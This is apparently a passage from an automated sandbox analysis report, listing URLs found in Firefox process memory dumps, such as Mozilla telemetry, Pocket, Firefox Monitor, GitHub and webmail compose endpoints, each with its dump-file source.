Source: firefox.exe, 00000015.00000002.2938420212.0000025940103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 00000015.00000002.2940088335.00000259403B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000015.00000002.2940088335.00000259403B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2867425093.000001CBE7AC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3049658732.000001EF1DF6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000015.00000002.2938420212.0000025940103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 00000015.00000002.2938420212.0000025940103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2938420212.0000025940103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 00000015.00000002.2896102021.0000025937F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/
Source: firefox.exe, 00000015.00000002.2909716254.000002593924C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/cfworker
Source: firefox.exe, 00000015.00000002.2939307905.000002594022D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2789894282.000002594023C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3124908460.000001EF35B83000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 00000015.00000002.2939307905.000002594021F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 00000015.00000002.2939307905.000002594021F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 00000015.00000002.2939307905.000002594022D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3124908460.000001EF35B83000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 00000015.00000002.2939307905.000002594022D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3124908460.000001EF35B83000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 00000015.00000003.2756753958.0000025937E1D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2893877831.0000025937600000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000015.00000003.2756585177.0000025938200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2756907545.0000025937E3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2757162605.0000025937E60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E9DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000015.00000002.2938420212.00000259401AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2821255219.00000259401AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3125524996.000001EF35C43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 00000015.00000002.2938420212.00000259401AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2821255219.00000259401AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3125524996.000001EF35C43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 00000015.00000002.2884763162.0000025934427000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 00000015.00000002.2964091165.0000370D2CF04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3121604934.000001EF35723000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 00000015.00000002.2921089355.000002593A997000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: firefox.exe, 00000015.00000002.2938420212.00000259401AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2821255219.00000259401AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3125524996.000001EF35C43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2879062103.0000025928311000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3051133453.000001EF29698000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3049658732.000001EF1DF11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 00000015.00000002.2940088335.0000025940359000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2867917308.000002ADC16E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2867425093.000001CBE7AEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2892227537.00000259360D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3071091391.000001EF2CEBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2937149751.000002593FE45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2867425093.000001CBE7ABC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3096265421.000001EF2F750000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000015.00000002.2938420212.0000025940103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 00000015.00000002.2939307905.000002594022D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3124908460.000001EF35B83000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2906919520.0000025938E3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2808209221.000002593A467000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000015.00000002.2944981005.0000025940656000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema.
Source: firefox.exe, 00000015.00000002.2944981005.0000025940656000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema./
Source: firefox.exe, 00000015.00000002.2944981005.0000025940656000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema/
Source: firefox.exe, 00000015.00000002.2944981005.0000025940656000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema/=
Source: firefox.exe, 00000015.00000002.2939307905.000002594022D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3124908460.000001EF35B83000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 00000015.00000002.2939307905.000002594022D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3124908460.000001EF35B83000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 00000015.00000002.2939307905.000002594022D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3124908460.000001EF35B83000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 00000015.00000002.2881592543.0000025933A7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2915888122.000002593A26F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3094683314.000001EF2F4E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 00000015.00000002.2915569464.000002593A1BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3055217724.000001EF29EEA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 00000015.00000002.2915022634.000002593A016000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2923113526.000002593ABBE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2822245342.000002593ABBE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2909163190.0000025939126000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3103108635.000001EF300E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3099000605.000001EF2FAC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000015.00000002.2878414441.000001EDFCC04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2929941467.000002593B67D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3115028552.000001EF311BB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3127918517.0000093E7B300000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: firefox.exe, 00000015.00000002.2884059485.00000259343B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.00000259358BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2896102021.0000025937F21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2896388912.0000025938065000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3075845573.000001EF2D713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3076567128.000001EF2D803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3073652965.000001EF2D206000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000015.00000002.2889978017.00000259358BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2882491080.0000025933F7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2896388912.0000025938065000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3075845573.000001EF2D713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3076567128.000001EF2D803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3075456153.000001EF2D6AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000015.00000002.2889978017.00000259358BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3075845573.000001EF2D713000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 00000015.00000002.2889978017.00000259358BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2882491080.0000025933F7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2896388912.0000025938065000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3075845573.000001EF2D713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3076567128.000001EF2D803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3075456153.000001EF2D6AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000015.00000002.2889978017.00000259358BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3075845573.000001EF2D713000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 00000015.00000002.2879062103.0000025928303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.00000259358AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3072972441.000001EF2D1F2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3051133453.000001EF29652000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.comhttps://support.mozilla.orgtestPermissionFromPrincipalbrowser.urlbar.sugg
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mozilla-hub.atlassian.net/browse/SDK-405
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 00000015.00000002.2962446017.000016D72D504000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org/
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3058191704.000001EF2A349000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000003.2999622236.000001EF2A49B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mzl.la/3NS9KJd
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: firefox.exe, 00000015.00000002.2889978017.00000259358BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2896388912.0000025938065000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3075845573.000001EF2D713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3076567128.000001EF2D803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 00000015.00000002.2889978017.00000259358BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2882491080.0000025933F7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2896388912.0000025938065000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3075845573.000001EF2D713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3076567128.000001EF2D803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3075456153.000001EF2D6AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000015.00000002.2889978017.00000259358BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3075845573.000001EF2D713000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D570000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 00000015.00000002.2938420212.0000025940103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3055217724.000001EF29E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
